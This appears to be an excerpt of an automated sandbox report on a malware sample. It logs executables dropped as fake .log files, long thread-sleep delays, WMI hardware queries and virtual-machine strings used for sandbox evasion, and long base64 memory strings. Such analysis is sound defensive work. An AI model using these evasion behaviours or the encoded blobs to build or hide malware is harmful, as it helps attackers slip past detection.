Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\unCSekjx.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lgJkAMCv.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hHZMHlwF.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TcFfQdBd.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UgLFMzEy.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OvRyOCaQ.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JulPgBvw.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\apvwEADp.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uaYsybMf.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wdLbULQa.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ouZtCEeJ.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ziDjmQZr.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eOeVwbKg.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bGNUAWQL.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IxKHLBgB.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\slPjJBeC.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bdzEpOzn.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OwFfUGTH.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZEamenMP.log	Jump to dropped file
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bVPmLfYi.log	Jump to dropped file
Source: C:\SavesHost\Blockbrowser.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\Opngnglp.log	Jump to dropped file

Source: C:\SavesHost\Blockbrowser.exe TID: 2180	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 2827 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488	Thread sleep count: 3042 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356	Thread sleep count: 2783 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436	Thread sleep count: 3158 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516	Thread sleep count: 2951 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep count: 2441 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 7944	Thread sleep time: -30000s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -37815825351104557s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -600000s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -599875s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -599762s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -599651s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -599547s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -599438s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -599328s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -599216s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8152	Thread sleep time: -10800000s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -599103s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -598989s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -598860s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -598750s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -598641s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -598516s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -598404s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -598297s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -598187s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -598078s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -597969s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -597860s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -597735s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -597610s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -597485s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -597360s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -597235s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -597123s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -597013s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -596906s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -596797s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -596672s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -596562s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -596447s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -596344s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -596222s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -596094s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -595981s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -595875s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -595766s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -595656s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -595547s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -595437s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -595328s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -595219s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -595109s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -594983s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -594795s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -594532s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -594110s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -593983s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168	Thread sleep time: -593872s >= -30000s
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8152	Thread sleep time: -300000s >= -30000s

Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\SavesHost\Blockbrowser.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_007DA69B
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_007EC220
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007FB348 FindFirstFileExA,	0_2_007FB348

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007EE6A3 VirtualQuery,GetSystemInfo,

0_2_007EE6A3

Source: C:\SavesHost\Blockbrowser.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 30000
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 922337203685477
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 600000
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599875
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599762
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599651
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599547
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599438
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599328
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599216
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 3600000
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 599103
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598989
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598860
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598750
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598641
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598516
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598404
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598297
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598187
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 598078
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597969
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597860
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597735
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597610
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597485
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597360
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597235
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597123
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 597013
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596906
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596797
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596672
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596562
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596447
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596344
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596222
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 596094
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595981
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595875
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595766
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595656
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595547
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595437
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595328
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595219
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 595109
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 594983
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 594795
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 594532
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 594110
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 593983
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 593872
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Thread delayed: delay time: 300000

Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3563942137.000000001373E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]S
Source: Ccp3sJPDXs.exe, 00000000.00000003.2202780401.0000000002D73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000002.00000003.2247084849.0000000002FAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: wscript.exe, 00000002.00000003.2247084849.0000000002FAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3571574275.000000001B650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3563942137.0000000013489000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 43GLmYxA+lKRwczfan0wIrkYLR/aX8KeHqxnVDbNDSmfh3ojSWHov2G3UwxUCHriib7USFZYXQw2ZfIDKOJjqRjCahUIjoAYzyQSo/qBDk6lKAXBI8BsAaYAlr7t6agxG0DUK3kAGtflh4dGk5lq8hwLueGmhiOxqPD0S7wu0G2OjnIoOI0MEblNyT69AmGtaa3whIwOLx2ZHhtHzlw285YYojSwHWj/cn42iFYIpAxlbICCowO50qCvQIbbb19sC+lmy2haDc6b6A3kSY0a+Oc4i4Ek1t6mBjLtkXT0B5Ix17TF6nhFFHtq2hKJLI+xiE9VqcGk/g0HCNG/WPQYBw6HR8ZGBjtGRpOG72xPBndOpjKgJtksABqRGZq0shke43bcj23+US6M5HekYSK6zMgZVmeTCewNklO8jkjo9eBdwB0fsZwxgxbCkYDhrmiP7oVCtLfmxnjlaHxxN7IGJ60MtEPw0HKs52YMXpwyre7YFVMDGfIw4whhmqkBkExW9u7HSrJUvwBE9En7aK+bSA5zNp2Amgn5wCThZmEpfmjbXBHMp0aRK28iiPpNOJQqxwU/WxDKgXqcWSx9B0JfII3QPZhGLEdiTX4Z8MMV0Y8Fr80PXLx6lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6